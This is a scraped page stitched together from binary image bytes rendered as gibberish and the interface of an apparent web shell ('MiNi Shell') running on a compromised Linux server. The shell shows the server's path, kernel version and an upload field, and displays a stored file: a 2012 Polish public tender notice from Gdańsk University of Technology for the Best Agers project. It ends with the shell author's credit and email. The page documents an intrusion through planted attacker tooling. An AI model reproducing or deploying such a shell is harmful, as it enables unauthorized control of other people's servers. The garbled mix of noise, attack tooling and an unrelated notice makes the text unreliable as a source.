JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121019/408052-N-2012.html

<p class="kh_header"><b>Gdańsk: Wykonanie działań projektowych (platforma internetowa, raport końcowy, organizacja spotkania promocyjnego, opracowanie merytoryczne, organizacja warsztatów programowych,) w ramach projektu Best Agers.</b><br>
<b>Numer ogłoszenia: 408052 - 2012; data zamieszczenia: 19.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Gdańska Wydział Zarządzania i Ekonomii , ul. Narutowicza 11/12, 80-233 Gdańsk, woj. pomorskie, tel. +48 58 347 22 70, faks +48 58 347 24 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pg.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie działań projektowych (platforma internetowa, raport końcowy, organizacja spotkania promocyjnego, opracowanie merytoryczne, organizacja warsztatów programowych,) w ramach projektu Best Agers..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie działań projektowych (platforma internetowa, raport końcowy, organizacja spotkania promocyjnego, organizacja warsztatów programowych, opracowanie merytoryczne) w ramach projektu Best Agers.
Do zadań Wykonawcy będzie należało w szczególności:
Zadanie nr 1: Opracowanie merytoryczne, graficzne i informatyczne polskiej wersji portalu internetowego biiugi.pl:
1. Portal powinien zostać wykonany według wzoru funkcjonującego portalu pod adresem biiugi.eu
2. Wykupienie domeny na rzecz Zamawiającego biiugi.pl (wraz z serwerem www i serwerem poczty elektronicznej) oraz trzech skrzynek e-mail. 
3. Przetłumaczenie materiałów portalu biiugi.eu na język polski (70 stron tekstu + 100 stron plików systemowych).
4. Wykonawca ma obowiązek wykonać test poprawnego działania portalu z udziałem min. 10 użytkowników. Wykonawca zobowiązany jest do  przekazania poprawnie działającego portalu biiugi.pl wraz z pełną dokumentacją techniczną i funkcjonalna oraz oprogramowaniem na nośniku CD.
5. Wykonanie polskiej instrukcji obsługi dla administratora i użytkownika portalu.
6. Przeprowadzenie kampanii marketingowej on-line. Potwierdzenie dotarcia do co najmniej 100 osób, przedstawienie dokumentów potwierdzających w formie listy e-mail z grupy docelowej tj. osoby do 30 roku życia i powyżej 55 lat życia.
7. Opracowanie koncepcji w języku polskim wykorzystania portalu biiugi jako narzędzia wspierania przedsiębiorczości. Minimalna objętość opracowania powinna wynosić 50 tys. znaków. Opracowanie powinno zawierać następujące części: uwarunkowania rozwoju przedsiębiorczości regionalnej z wykorzystaniem narzędzi informatycznych i komunikacji elektronicznej, model współpracy mentorów z młodymi przedsiębiorcami z wykorzystaniem portalu biiugi, procedury współpracy mentorów z młodymi przedsiębiorcami, wykaz pomiotów potencjalnie zainteresowanych wykorzystaniem portalu biiugi, koncepcję rozwoju portalu biiugi. Opracowanie musi zostać przekazane w 3 wydrukowanych egzemplarzach oraz w edytowalnej wersji elektronicznej.
8. Organizacja spotkania promocyjnego portalu biiugi.pl. Na spotkaniu ma się pojawić nie mniej niż 50 osób. Zamawiający udostępni salę na terenie Politechniki Gdańskiej na Wydziale Zarządzania i Ekonomii.
Zadanie nr 2: Sporządzenie raportu merytorycznego całości działań projektu Best Agers, które wykonała Politechnika Gdańska:
1. Wersja polska powinna zawierać minimum 80 tys. znaków bez załączników. Wersja angielska powinna zawierać minimum 40 tys. znaków bez załączników (skrót).
2. Struktura raportu: 1. Executive summary, streszczenie w języku polskim; 2. Executive summary, streszczenie w języku angielskim; 3. Założenia programu Baltic Sea Region (BSR); 4. Cel i zakres projektu Best Agers; 5. Opis działalności polskich partnerów (szczególnie Politechniki Gdańskiej) w poszczególnyh częściach projektu (pakietach zadaniowych WP); 6. Rezultaty uzyskane w poszczególnych częściach projektu (Activities) z odwołaniem do materiałów źródłowych w załącznikach oraz wskaźników projektu; 7. Opis wydarzeń zorganizowanych w ramach projektu (spotkania projektowe, wydarzenia projektowe, konferencje naukowe, konferencje i warsztaty otwarte, wydarzenia specjalne); 8. Rezultaty promocji projektu i jego osiągnięć (internet, informacje prasowe, materiał fotograficzny); 9. Załączniki (m.in. wszystkie raporty cząstkowe wraz z zestawieniem, wszystkie publikacje wraz z zestawieniem).
3. Raport musi być zgodny ze wszystkimi wymogami Unii Europejskiej w tym zakresie, szczególnie z wymogami programu Baltic Sea Region Programme.
4. W raporcie należy zawrzeć odniesienie zrealizowanych prac w stosunku do priorytetów i celów programu BSR, a także do celów i działań projektu Best Agers.
5. Raport musi zawierać odwołania do publikacji powstałych w ramach realizacji prac projektowych.
6. Raport musi zostać przekazany w 3 wydrukowanych egzemplarzach oraz w edytowalnej wersji elektronicznej.
Zadanie nr 3: Organizacja spotkania promocyjnego projektu Best Agers w Politechnice Gdańskiej w Gdańsku:
1. Zapewnienie udziału przedstawicieli władz regionalnych i lokalnych.
2. Zapewnienie udziału przedstawicieli mediów lokalnych i regionalnych.
3. Opracowanie, wydruk i dystrybucja broszury informacyjnej (format A4, full color, papier kredowy, cztery strony, sztuk. 100) na potrzeby spotkania promocyjnego. Zamawiający przekaże tekst w terminie 7 dni po podpisaniu umowy.
4. Wystosowanie zaproszeń dla władz i mediów (min 40 szt.).
Zamawiający przekaże listę osób w terminie 7 dni po podpisaniu umowy.
5. Czas trwania spotkania minimum 4 godziny.
Zadanie nr 4: Opracowanie publikacji pt. Osoby 55+ na rynku pracy w Polsce:
1. Opracowanie w języku polskim powinno posiadać minimalną objętość 80 tys. znaków ze spacjami.
2. Opracowanie musi zawierać w szczególności merytoryczny przegląd źródeł wiedzy w zakresie przedsiębiorczej aktywności osób w wieku 55+ oraz charakteryzować stan obecny i zarysowywać wyzwania na przyszłość w Polsce w odniesieniu do Regionu Morza Bałtyckiego oraz Unii Europejskiej
3. Opracowanie powinno uwzględniać co najmniej następujące zagadnienia: specyfikę zmian demograficznych w Polsce; politykę UE dotyczącą osób 55+; politykę krajową dotyczącą osób 55+; aktywność zawodową osób 55+; rolę osób 55+ w przedsiębiorstwach; rozwój kompetencji osób 55+; udział osób 55+ w społeczeństwie informacyjnym.
4. Opracowanie musi zostać przekazane w 3 wydrukowanych egzemplarzach oraz w edytowalnej wersji elektronicznej.
Zadanie nr 5: Organizacja warsztatu pt. Zarządzanie wiekiem i sukcesją w pomorskich przedsiębiorstwach - transfer wiedzy:
1. Czas trwania warsztatów - 2 dni. Miejsce organizacji województwo pomorskie w odległości od siedziby Zamawiającego nie większej niż 70 km.
2. Minimalna liczba uczestników - 12 przedstawicieli przedsiębiorstw z sektora MSP
3. W ramach warsztatów powinno zostać przeprowadzone: jedno szkolenie stacjonarne, jedna wizyta studyjna w trzech przedsiębiorstwach realizujących politykę zarządzania wiekiem. Wykonawca musi zapewnić co najmniej 2 moderatorów prowadzących w każdym dniu prowadzenia warsztatów. Warsztat powinien być realizowany w co najmniej 4 modułach o efektywnym czasie trwania 90 minut.
4. Zakres merytoryczny warsztatu musi obejmować:
- Koncepcje zarządzania jako odpowiedź na problemy demograficzne
- Zarządzanie wiekiem w małych i średnich przedsiębiorstwach
- Zarządzanie zespołem intergeneracyjnym
- Motywacja rozwoju współpracy integeneracyjnej.
5. Wykonawca musi przygotować materiały szkoleniowe w postaci slajdów prezentacyjnych w liczbie nie mniejszej niż 20 na każdy moduł warsztatów. Materiały muszą zostać przekazane Zamawiającemu 7 dni przed rozpoczęciem warsztatów a uczestnikom w postaci papierowej najpóźniej w momencie rozpoczęcia warsztatów.
6. Zapewnienie zakwaterowania i wyżywienia dla wszystkich uczestników: 2 noclegów dla 12 osób, 2 śniadania, 2 obiady dwudaniowe, 2 kolacje w formie bufetu szwedzkiego, dwie przerwy kawowe - kawa, herbata, ciasta, napoje chłodzące oraz materiałów szkoleniowych.
7. Ewaluacja warsztatów w postaci badań ankietowych uczestników Zamawiający prosi o przedstawienie propozycji ankiety do akceptacji na 5 dni przed planowanym spotkaniem.
8. Warsztaty muszą zostać zdokumentowane sprawozdaniem zawierającym co najmniej: program i zakres tematyczny, listę uczestników z danymi kontaktowymi co najmniej e-mail, imię i nazwisko, nazwę firmy, miejsca pracy, opis zrealizowanych szkoleń i wizyt studyjnych, ewaluację warsztatów.
Wykonawca ma obowiązek wraz ofertą złożyć harnomogram realizacji zadań, pamiętając, że koniec realizacji ma być zakończony do dnia 30 listopada. Terminy w harnomogramie mogą ulec zmianie po uzgodnieniu z Zamawiającym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.10.00-5, 72.22.30.00-4, 72.40.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu - załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej;
1. co najmniej 1 usługę polegającą na opracowaniu merytorycznym, graficznym i informatycznym portalu internetowego poświęconego zagadnieniom rynku pracy.
2. co najmniej 1 usługę polegającą na opracowaniu raportu merytorycznego dotyczącego projektu, który był współfinansowany bądź sfinansowany ze środków pomocowych (Unii Europejskiej lub innych funduszy, np. Instrumentu Norweskiego, Narodowego Funduszu Gospodarki Wodnej i Środowiska, itp);
3. co najmniej 1 usługi polegającej na organizacji warsztatów, których tematem wiodącym był rynek pracy w Polsce 
Wykonawca zobowiązany  jest do przedstawienia dokumentów potwierdzających należyte wykonanie zamówienia - załącznik nr 5</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia o niżej wymienionych kwalifikacjach:
a) Specjalista ds. tworzenia portali internetowych posiadający: 
- wykształcenie wyższe,
- minimum 3 letnie doświadczenie zawodowe w tworzeniu portali internetowych.
b) Specjalista ds. zarządzania projektami posiadający:
- wykształcenie wyższe,
- minimum 3 letnie doświadczenie zawodowe w dziedzinie zarządzania projektami,
c) Specjalista ds. zarządzania wiekiem w przedsiębiorstwach posiadający:
- wykształcenie wyższe
- minimum 3 letnie doświadczenie zawodowe w zakresie zarządzania wiekiem w przedsiębiorstwach,
d) Specjalista ds. rynku pracy, posiadający:
- wykształcenie wyższe,
- minimum 3 letnie doświadczenie zawodowe w zakresie rynku pracy,
e) Specjalista ds. organizacji wydarzeń promocyjnych, posiadający:
- wykształcenie wyższe,
- minimum 3 letnie doświadczenie zawodowe w zakresie organizacji wydarzeń promocyjnych.
- załącznik nr 6</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia o niżej wymienionych kwalifikacjach:
a) Specjalista ds. tworzenia portali internetowych posiadający: 
- wykształcenie wyższe,
- minimum 3 letnie doświadczenie zawodowe w tworzeniu portali internetowych.
b) Specjalista ds. zarządzania projektami posiadający:
- wykształcenie wyższe,
- minimum 3 letnie doświadczenie zawodowe w dziedzinie zarządzania projektami,
c) Specjalista ds. zarządzania wiekiem w przedsiębiorstwach posiadający:
- wykształcenie wyższe
- minimum 3 letnie doświadczenie zawodowe w zakresie zarządzania wiekiem w przedsiębiorstwach,
d) Specjalista ds. rynku pracy, posiadający:
- wykształcenie wyższe,
- minimum 3 letnie doświadczenie zawodowe w zakresie rynku pracy,
e) Specjalista ds. organizacji wydarzeń promocyjnych, posiadający:
- wykształcenie wyższe,
- minimum 3 letnie doświadczenie zawodowe w zakresie organizacji wydarzeń promocyjnych.
- załącznik nr 6</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 150 000,00 PLN;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzp.pg.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Gdańska
Wydział Zarządzania i Ekonomii
ul. Narutowicza 11/12, siedziba ul. Traugutta 79 Pok. 518
 80-233 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2012 godzina 10:00, miejsce: Politechnika Gdańska
Wydział Zarządzania i Ekonomii
ul. Narutowicza 11/12, siedziba ul. Traugutta 79 Pok. 518
 80-233 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> BEST AGERS Baltic Sea Region Programme 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com